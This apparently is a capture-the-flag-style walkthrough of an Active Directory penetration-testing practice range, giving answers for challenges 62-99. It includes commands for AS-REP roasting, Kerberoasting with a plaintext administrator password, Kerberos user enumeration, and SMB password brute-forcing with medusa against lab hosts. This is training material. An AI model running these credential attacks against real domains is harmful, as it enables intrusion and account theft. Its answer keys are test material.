AD Range - HackMD

# AD Range ## Environment ### CPENT.LOCALNET0(172.25.170.12) * ![image](https://hackmd.io/_uploads/rJ4Ser-qlg.png) ### CPENTV2.LOCALNET(172.25.170.25) * ![image](https://hackmd.io/_uploads/Sk_tgrZ5lx.png) ### ECC.LOCALNET(170.25.170.80) * ![image](https://hackmd.io/_uploads/rJDjeHW5ee.png) ### 172.25.170.110 * ![image](https://hackmd.io/_uploads/r1Lperb9ex.png) ### CPENT.LOCALNET(172.25.170.150) * ![image](https://hackmd.io/_uploads/ryZebrbqxx.png) ### SERVER2008.CPENT.LOCALNET(172.25.170.170) * ![image](https://hackmd.io/_uploads/B1JXFNBsll.png) ### LPT.COM0(172.25.170.190) * ![image](https://hackmd.io/_uploads/SJZf-BWcgx.png) ### CPENT.LOCALNET0(172.25.170.200) * ![image](https://hackmd.io/_uploads/BkF4ZBZ5ge.png) ## Challenge 62 ![image](https://hackmd.io/_uploads/rJGAp4Z9gl.png) * Using `GetNPUsers.py` enumerate the users for SPN * ![image](https://hackmd.io/_uploads/SyaP_HZqex.png) ```zsh= GetNPUsers.py LPT.COM/ -dc-ip 172.25.170.190 -usersfile Usernames.txt -format hashcat -outputfile hashes.txt |grep User ``` * Anwser:`user-one` ## Challage 63 ![image](https://hackmd.io/_uploads/rkCadHb9xx.png) ```zsh= nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='LPT.COM0',userdb=Usernames.txt 172.25.170.190 ``` * Answer:`krb5-enum-users.realm` ## Challenge 64 ![image](https://hackmd.io/_uploads/Hk1zoHbqee.png) * Answer:`DnsUpdateProxy` ## Challenge 65 ![image](https://hackmd.io/_uploads/BkvPmwZcxg.png) * Answer:`cpent` ## Challenge 66 ![image](https://hackmd.io/_uploads/r1xKmv-qgl.png) * ![image](https://hackmd.io/_uploads/BkVqTTv5ll.png) ```powershell= Get-NetForestDomain Get-NetDomainTrust ``` * Answer:`LA` ## Challenge 67 ![image](https://hackmd.io/_uploads/SJsN8Pbcll.png) * ![image](https://hackmd.io/_uploads/r11U0aDqel.png) ```powershell= Get-NetForestTrust ``` * Answer:`ECC` ## Challenge 68 ![image](https://hackmd.io/_uploads/BJjzm6P9gg.png) * ![image](https://hackmd.io/_uploads/BkVqTTv5ll.png) * Answer:`LA` ## Challenge 69 ![image](https://hackmd.io/_uploads/BkJ8mpPqee.png) * Answer: ## Challenge 70 ![image](https://hackmd.io/_uploads/Bk8clWdcge.png) * Answer: ## Challenge 71 ![image](https://hackmd.io/_uploads/rysjgb_5gg.png) * Answer: ## Challenge 72 ![image](https://hackmd.io/_uploads/B1bplZd9gx.png) * ![image](https://hackmd.io/_uploads/SJcGZ-dqll.png) * Answer:`172.25.170.25` ## Challenge 73 ![image](https://hackmd.io/_uploads/H1MtW-dqge.png) * ![image](https://hackmd.io/_uploads/S1-a-ZOcgg.png) * Answer:`AD-WIN` ## Challenge 74 ![image](https://hackmd.io/_uploads/By5kf-_cxl.png) * ![image](https://hackmd.io/_uploads/By3Hj-_qll.png) ```zsh= GetUserSPNs.py -request -dc-ip 172.25.170.25 CPENTV2.LOCALNET/administrator:'CPENT@@2024@@2024' | grep -i 'POP3' ``` * Answer:`Pablo Baker` ## Challenge 75 ![image](https://hackmd.io/_uploads/S1p_s-Ocll.png) * ![image](https://hackmd.io/_uploads/SyAqs-Oqel.png) * Answer:`Clint Franks` ## Challenge 76 ![image](https://hackmd.io/_uploads/S190sbO9le.png) * * Answer: ## Challenge 77 ![image](https://hackmd.io/_uploads/SJQEyzdqee.png) * ![image](https://hackmd.io/_uploads/rJGIkGd9gl.png) * Answer:`Bernice Lott` ## Challenge 78 ![image](https://hackmd.io/_uploads/HkWqxf_9xe.png) * ![image](https://hackmd.io/_uploads/ryswrM_qlx.png) * Answer:`BB9` ## Challenge 79 ![image](https://hackmd.io/_uploads/rJGzUfO5lg.png) * ![image](https://hackmd.io/_uploads/SyLEnzucge.png) ```powershell= Get-Command ExSetup.exe | ForEach-Object { $_.FileVersionInfo } ``` * https://learn.microsoft.com/zh-tw/exchange/new-features/build-numbers-and-release-dates * ![image](https://hackmd.io/_uploads/HkVBY7Bsgg.png) * Answer:`12` ## Challenge 80 ![image](https://hackmd.io/_uploads/r1Uqq7Sole.png) * ![image](https://hackmd.io/_uploads/Sy0GTXrsgl.png) * Answer:`address` ## Challenge 81 ![image](https://hackmd.io/_uploads/BJlOXPW_cll.png) * ![image](https://hackmd.io/_uploads/HkR4D-uqlx.png) * Answer:`CPENTV2.LOCALNET` ## Challenge 82 ![image](https://hackmd.io/_uploads/S1RqT7Hjgx.png) * ![image](https://hackmd.io/_uploads/HJzc0XHogg.png) * Answer:`2012` ## Challenge 83 ![image](https://hackmd.io/_uploads/r1eSJEHsgl.png) * ![image](https://hackmd.io/_uploads/HyqDyEBolg.png) * Answer:`Enabled` ## Challenge 84 ![image](https://hackmd.io/_uploads/SkujGVBixg.png) * ![image](https://hackmd.io/_uploads/B1gw2GEBsxl.png) * Answer:`WS2012-ADUSER` ## Challenge 85 ![image](https://hackmd.io/_uploads/Hk1CMVHsxl.png) * ![image](https://hackmd.io/_uploads/SJDbQNBolx.png) * Answer:`WS2012-ADROOT` ## Challenge 86 ![image](https://hackmd.io/_uploads/By8d7EHole.png) * Answer:`2008` ## Challenge 87 ![image](https://hackmd.io/_uploads/SyU7NVrjee.png) * Answer:`Disabled` ## Challenge 88 ![image](https://hackmd.io/_uploads/SkaSV4Hiex.png) * 170這台有擋ICMP, 用`nxc`等工具去爆會直接跳time out, 改用`medusa` * ![image](https://hackmd.io/_uploads/S1_3j4Ujge.png) ```zsh= medusa -h 172.25.170.170 -u administrator -P Passwords.txt -M smbnt ``` * 再利用rpclient連線 * ![image](https://hackmd.io/_uploads/HyemhVUoge.png) ```zsh= rpcclient -U 'administrator%Pa$$w0rd123456' 172.25.170.170 ``` * smbclient抓檔案 * ![image](https://hackmd.io/_uploads/BkH16NIjxx.png) * ![image](https://hackmd.io/_uploads/ryqb6VIoxx.png) * Answer:`WS2008-User` ## Challenge 89 ![image](https://hackmd.io/_uploads/S13P4VSogl.png) * Answer:`WS2008-Admin` ## Challenge 90 ![image](https://hackmd.io/_uploads/ryZtEVHsxx.png) * ![image](https://hackmd.io/_uploads/HysQSNSoel.png) * Answer:`Desktop5-user` ## Challenge 91 ![image](https://hackmd.io/_uploads/ByHvSESige.png) * ![image](https://hackmd.io/_uploads/HysQSNSoel.png) * Answer:`Desktop5-root` ## Challenge 92 ![image](https://hackmd.io/_uploads/BJ1nHNSill.png) * ![image](https://hackmd.io/_uploads/HJ1AL4Holx.png) * Answer:`CPENT` ## Challenge 93 ![image](https://hackmd.io/_uploads/Hyc7vEBsll.png) * ![image](https://hackmd.io/_uploads/HJ1AL4Holx.png) * Answer:`user-one` ## Challenge 94 ![image](https://hackmd.io/_uploads/HJTUvVrsex.png) * ![image](https://hackmd.io/_uploads/BJjRdErsxx.png) * Answer:`RemoteSigned` ## Challenge 95 ![image](https://hackmd.io/_uploads/HyuWd4Hoxg.png) * ![image](https://hackmd.io/_uploads/HJm4dNSigx.png) * Answer:`AD-WIN2019-ADMI` ## Challenge 97 ![image](https://hackmd.io/_uploads/Bk9fSb_cgl.png) * ![image](https://hackmd.io/_uploads/rJwmrZuqgx.png) ```powershell= Get-ADForest | Select-Object -ExpandProperty Domains ``` * Answer:`ECC.LOCALNET` ## Challenge 98 ![image](https://hackmd.io/_uploads/rJT1Lb_5lg.png) * ![image](https://hackmd.io/_uploads/BkByLbOcge.png) * Answer:`Required` ## Challenge 99 ![image](https://hackmd.io/_uploads/HJZV4Zucge.png) * ![image](https://hackmd.io/_uploads/r1CNEZ_cgl.png) * Answer:`WS-AD-TWO-USER`